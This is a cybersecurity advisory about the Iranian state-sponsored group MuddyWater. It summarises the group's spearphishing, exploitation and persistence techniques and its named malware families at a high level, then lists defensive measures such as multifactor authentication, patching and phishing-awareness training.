Iranian Government-Sponsored APT Group Target Government and Commercial Networks

Systems Networks
Advisory ID:
March 1, 2022


MuddyWater, an Iranian government-sponsored advanced persistent threat (APT) actor, has been observed conducting active cyber espionage and other malicious cyber operations against a variety of government and private-sector organizations in Africa and other continents, including telecommunications, defense, oil and natural gas, and relevant government agencies. This threat group is also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP. Zagros. The APT group was seen employing spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to gain access to sensitive government and commercial networks.

Description & Consequence

MuddyWater attempts to coax their targeted victim into downloading ZIP files containing either an Excel file with a malicious macro that communicates with the actor's C2 server or a PDF file that drops a malicious file to the victim's network as part of its spearphishing campaign. MuddyWater actors have been observed exploiting publicly disclosed vulnerabilities and employing open-source tools and strategies to gain access to sensitive data on victims' systems and deploy ransomware. These actors also maintain persistence on victim networks by employing techniques such as side-loading dynamic link libraries (DLLs) to trick legitimate programs into running malware and obfuscating PowerShell scripts to conceal command and control (C2) functions. Furthermore, the group employs multiple malware sets, including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and POWERSTATS, for malware loading, backdoor access, persistence and exfiltration.

When the exploits are successful, the threat group gains unauthorized access to sensitive data, installs backdoors, maintains persistence on the victim's system, and then deploys ransomware. MuddyWater actors are well-positioned to both provide stolen data and access to the Iranian government and to share this information with other malicious cyber actors.


The following measures are required to guide against these threats:

  1. As email attachments and files downloaded via email links frequently contain executable code, use application control software to limit the applications and executable code that users can run. 
  2. Use multifactor authentication where possible, particularly for webmail, virtual private networks, and accounts that access critical systems. 
  3. Administrator privileges should be used sparingly. Users who browse the internet, use email, and execute code with administrator privileges are ideal spearphishing targets because their systems, once infected, allow attackers to move laterally across the network, gain additional access, and access highly sensitive information.
  4. Enable antivirus and anti-malware software and update signature definitions in a timely manner. Well-maintained antivirus software may prevent use of commonly deployed attacker tools that are delivered via spearphishing. 
  5. Be wary of unsolicited email or social media contact from anyone you do not know personally. In these communications, do not click on hyperlinks or open attachments.
  6. Consider adding an email banner to emails received from outside your organization and disabling hyperlinks in received emails.
  7. Train users through awareness and simulations to recognize and report phishing and social engineering attempts. Identify and suspend access of user accounts exhibiting unusual activity.
  8. Use threat reputation services on network devices, operating systems, applications, and email services. Low-reputation email addresses, files, URLs, and IP addresses used in spearphishing attacks can be detected and prevented using reputation services. 
  9. Install updates/patches for operating systems, software, and firmware as soon as they are available. Patching known exploited vulnerabilities comes first.



Related Articles